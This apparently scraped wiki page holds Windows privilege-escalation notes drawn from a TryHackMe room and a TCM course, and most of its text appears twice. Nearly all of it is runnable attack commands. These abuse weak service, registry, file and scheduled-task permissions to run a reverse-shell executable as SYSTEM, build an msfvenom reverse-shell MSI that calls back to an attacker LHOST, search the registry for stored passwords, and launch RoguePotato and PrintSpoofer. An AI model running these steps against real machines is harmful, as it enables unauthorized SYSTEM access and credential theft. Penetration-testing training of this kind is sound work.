Windows

Scripts & Sites

LOLBAS

Insecure Service Permissions:

# Access check can be downloaded at https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk
#Use accesschk.exe to check the "user" account's permissions on the "daclsvc" service

C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc

Note that the "user" account has the permission to change the service config (SERVICE_CHANGE_CONFIG).

Query the service and note that it runs with SYSTEM privileges (SERVICE_START_NAME):

sc qc daclsvc

Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse.exe executable you created:

sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:

net start daclsvc

Unquoted Service Path

Query the "unquotedsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME) and that the BINARY_PATH_NAME is unquoted and contains spaces.

sc qc unquotedsvc

Using accesschk.exe, note that the BUILTIN\Users group is allowed to write to the C:\Program Files\Unquoted Path Service\ directory:

C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

Copy the reverse.exe executable you created to this directory and rename it Common.exe:

copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
#If the service is already running stop it first.
net stop unquotedsvc
net start unquotedsvc

Weak Registry Permissions

Query the "regsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).

sc qc regsvc

Using accesschk.exe, note that the registry entry for the regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users):

C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

Overwrite the ImagePath registry key to point to the reverse.exe executable you created:

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
#If the service is running stop if first.
net stop regsvc
net start regsvc

Insecure Service Executables

Query the "filepermsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).

sc qc filepermsvc

Using accesschk.exe, note that the service binary (BINARY_PATH_NAME) file is writable by everyone:

C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

Copy the reverse.exe executable you created and replace the filepermservice.exe with it:

copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
#If the service is running stop if first.
net stop regsvc
net start filepermsvc

Registry Auto Runs

Query the registry for AutoRun executables:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Using accesschk.exe, note that one of the AutoRun executables is writable by everyone:

C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

Copy the reverse.exe executable you created and overwrite the AutoRun executable with it:

copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y

Start a listener on Kali and then restart the Windows VM. Open up a new RDP session to trigger a reverse shell running with admin privileges. You should not have to authenticate to trigger it, however if the payload does not fire, log in as an admin (admin/password123) to trigger it. Note that in a real world engagement, you would have to wait for an administrator to log in themselves!

rdesktop 10.10.255.248

Registry - AlwaysInstallElevated

Query the registry for AlwaysInstallElevated keys:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Note that both keys are set to 1 (0x1).

On Kali, generate a reverse shell Windows Installer (reverse.msi) using msfvenom. Update the LHOST IP address accordingly:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi

Transfer the reverse.msi file to the C:\PrivEsc directory on Windows (use the SMB server method from earlier).

Start a listener on Kali and then run the installer to trigger a reverse shell running with SYSTEM privileges:

msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

# Keep in mind when using MSI installer exploits that you should avoid running 
# multiple MSI installer's. Usually you have one shot then the box will need to be 
# reverted.

Passwords Stored in Registry

The registry can be searched for keys and values that contain the word "password":

reg query HKLM /f password /t REG_SZ /s

If you want to save some time, query this specific key to find admin AutoLogon credentials:

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

On Kali, use the winexe command to spawn a command prompt running with the admin privileges (update the password with the one you found):

winexe -U 'admin%password' //10.10.255.248 cmd.exe

List Saved Credentials

List any saved credentials:

cmdkey /list

Note that credentials for the "admin" user are saved. If they aren't, run the C:\PrivEsc\savecred.bat script to refresh the saved credentials.

Start a listener on Kali and run the reverse.exe executable using runas with the admin user's saved credentials:

runas /savecred /user:admin C:\PrivEsc\reverse.exe

Scheduled Tasks

View the contents of the C:\DevTools\CleanUp.ps1 script:

type C:\DevTools\CleanUp.ps1

The script seems to be running as SYSTEM every minute. Using accesschk.exe, note that you have the ability to write to this file:

C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1

Start a listener on Kali and then append a line to the C:\DevTools\CleanUp.ps1 which runs the reverse.exe executable you created:

echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1

Wait for the Scheduled Task to run, which should trigger the reverse shell as SYSTEM.

Insecure GUI Apps

Start an RDP session as the "user" account:

rdesktop -u user -p password321 10.10.255.248

Double-click the "AdminPaint" shortcut on your Desktop. Once it is running, open a command prompt and note that Paint is running with admin privileges:

tasklist /V | findstr mspaint.exe

In Paint, click "File" and then "Open". In the open file dialog box, click in the navigation input and paste: file://c:/windows/system32/cmd.exe

Press Enter to spawn a command prompt running with admin privileges.

Startup Apps

Using accesschk.exe, note that the BUILTIN\Users group can write files to the StartUp directory:

C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

Using cscript, run the C:\PrivEsc\CreateShortcut.vbs script which should create a new shortcut to your reverse.exe executable in the StartUp directory:

cscript C:\PrivEsc\CreateShortcut.vbs

Start a listener on Kali, and then simulate an admin logon using RDP and the credentials you previously extracted:

rdesktop -u admin 10.10.255.248

A shell running as admin should connect back to your listener.

Token Impersonation - Rogue Potato

Set up a socat redirector on Kali, forwarding Kali port 135 to port 9999 on Windows:

sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.255.248:9999

Start a listener on Kali. Simulate getting a service account shell by logging into RDP as the admin user, starting an elevated command prompt (right-click -> run as administrator) and using PSExec64.exe to trigger the reverse.exe executable you created with the permissions of the "local service" account:

C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe

Start another listener on Kali.

Now, in the "local service" reverse shell you triggered, run the RoguePotato exploit to trigger a second reverse shell running with SYSTEM privileges (update the IP address with your Kali IP accordingly):

C:\PrivEsc\RoguePotato.exe -r 10.10.10.10 -e "C:\PrivEsc\reverse.exe" -l 9999

SeImpersonatePrivilege Enabled

whoami /privs 
# If SeImpersonatePrivilege is enabled it is vulnerable to Printer Nightmare LPE.
# https://github.com/dievus/printspoofer

PrintSpoofer.exe -i -c cmd

Admin to NT Authority\System

https://blog.geoda-security.com/2017/06/elevate-from-admin-to-nt-authoritysystem.html

Credits

https://tryhackme.com/room/windows10privesc By Tib3rius
https://academy.tcm-sec.com/courses - TCM Windows Privilege Escalation Course

PreviousLinux NextWeb Apps

Last updated 2 years ago

Was this helpful?

Scripts & Sites

LOLBAS

Insecure Service Permissions:

# Access check can be downloaded at https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk
#Use accesschk.exe to check the "user" account's permissions on the "daclsvc" service

C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc

Note that the "user" account has the permission to change the service config (SERVICE_CHANGE_CONFIG).

Query the service and note that it runs with SYSTEM privileges (SERVICE_START_NAME):

sc qc daclsvc

Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse.exe executable you created:

sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:

net start daclsvc

Unquoted Service Path

Query the "unquotedsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME) and that the BINARY_PATH_NAME is unquoted and contains spaces.

sc qc unquotedsvc

Using accesschk.exe, note that the BUILTIN\Users group is allowed to write to the C:\Program Files\Unquoted Path Service\ directory:

C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

Copy the reverse.exe executable you created to this directory and rename it Common.exe:

copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
#If the service is already running stop it first.
net stop unquotedsvc
net start unquotedsvc

Weak Registry Permissions

Query the "regsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).

sc qc regsvc

Using accesschk.exe, note that the registry entry for the regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users):

C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

Overwrite the ImagePath registry key to point to the reverse.exe executable you created:

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
#If the service is running stop if first.
net stop regsvc
net start regsvc

Insecure Service Executables

Query the "filepermsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).

sc qc filepermsvc

Using accesschk.exe, note that the service binary (BINARY_PATH_NAME) file is writable by everyone:

C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

Copy the reverse.exe executable you created and replace the filepermservice.exe with it:

copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
#If the service is running stop if first.
net stop regsvc
net start filepermsvc

Registry Auto Runs

Query the registry for AutoRun executables:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Using accesschk.exe, note that one of the AutoRun executables is writable by everyone:

C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

Copy the reverse.exe executable you created and overwrite the AutoRun executable with it:

copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y

Start a listener on Kali and then restart the Windows VM. Open up a new RDP session to trigger a reverse shell running with admin privileges. You should not have to authenticate to trigger it, however if the payload does not fire, log in as an admin (admin/password123) to trigger it. Note that in a real world engagement, you would have to wait for an administrator to log in themselves!

rdesktop 10.10.255.248

Registry - AlwaysInstallElevated

Query the registry for AlwaysInstallElevated keys:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Note that both keys are set to 1 (0x1).

On Kali, generate a reverse shell Windows Installer (reverse.msi) using msfvenom. Update the LHOST IP address accordingly:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi

Transfer the reverse.msi file to the C:\PrivEsc directory on Windows (use the SMB server method from earlier).

Start a listener on Kali and then run the installer to trigger a reverse shell running with SYSTEM privileges:

msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

# Keep in mind when using MSI installer exploits that you should avoid running 
# multiple MSI installer's. Usually you have one shot then the box will need to be 
# reverted.

Passwords Stored in Registry

The registry can be searched for keys and values that contain the word "password":

reg query HKLM /f password /t REG_SZ /s

If you want to save some time, query this specific key to find admin AutoLogon credentials:

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

On Kali, use the winexe command to spawn a command prompt running with the admin privileges (update the password with the one you found):

winexe -U 'admin%password' //10.10.255.248 cmd.exe

List Saved Credentials

List any saved credentials:

cmdkey /list

Note that credentials for the "admin" user are saved. If they aren't, run the C:\PrivEsc\savecred.bat script to refresh the saved credentials.

Start a listener on Kali and run the reverse.exe executable using runas with the admin user's saved credentials:

runas /savecred /user:admin C:\PrivEsc\reverse.exe

Scheduled Tasks

View the contents of the C:\DevTools\CleanUp.ps1 script:

type C:\DevTools\CleanUp.ps1

The script seems to be running as SYSTEM every minute. Using accesschk.exe, note that you have the ability to write to this file:

C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1

Start a listener on Kali and then append a line to the C:\DevTools\CleanUp.ps1 which runs the reverse.exe executable you created:

echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1

Wait for the Scheduled Task to run, which should trigger the reverse shell as SYSTEM.

Insecure GUI Apps

Start an RDP session as the "user" account:

rdesktop -u user -p password321 10.10.255.248

Double-click the "AdminPaint" shortcut on your Desktop. Once it is running, open a command prompt and note that Paint is running with admin privileges:

tasklist /V | findstr mspaint.exe

In Paint, click "File" and then "Open". In the open file dialog box, click in the navigation input and paste: file://c:/windows/system32/cmd.exe

Press Enter to spawn a command prompt running with admin privileges.

Startup Apps

Using accesschk.exe, note that the BUILTIN\Users group can write files to the StartUp directory:

C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

Using cscript, run the C:\PrivEsc\CreateShortcut.vbs script which should create a new shortcut to your reverse.exe executable in the StartUp directory:

cscript C:\PrivEsc\CreateShortcut.vbs

Start a listener on Kali, and then simulate an admin logon using RDP and the credentials you previously extracted:

rdesktop -u admin 10.10.255.248

A shell running as admin should connect back to your listener.

Token Impersonation - Rogue Potato

Set up a socat redirector on Kali, forwarding Kali port 135 to port 9999 on Windows:

sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.255.248:9999

Start a listener on Kali. Simulate getting a service account shell by logging into RDP as the admin user, starting an elevated command prompt (right-click -> run as administrator) and using PSExec64.exe to trigger the reverse.exe executable you created with the permissions of the "local service" account:

C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe

Start another listener on Kali.

Now, in the "local service" reverse shell you triggered, run the RoguePotato exploit to trigger a second reverse shell running with SYSTEM privileges (update the IP address with your Kali IP accordingly):

C:\PrivEsc\RoguePotato.exe -r 10.10.10.10 -e "C:\PrivEsc\reverse.exe" -l 9999

SeImpersonatePrivilege Enabled

whoami /privs 
# If SeImpersonatePrivilege is enabled it is vulnerable to Printer Nightmare LPE.
# https://github.com/dievus/printspoofer

PrintSpoofer.exe -i -c cmd

Admin to NT Authority\System

https://blog.geoda-security.com/2017/06/elevate-from-admin-to-nt-authoritysystem.html

Credits

https://tryhackme.com/room/windows10privesc By Tib3rius
https://academy.tcm-sec.com/courses - TCM Windows Privilege Escalation Course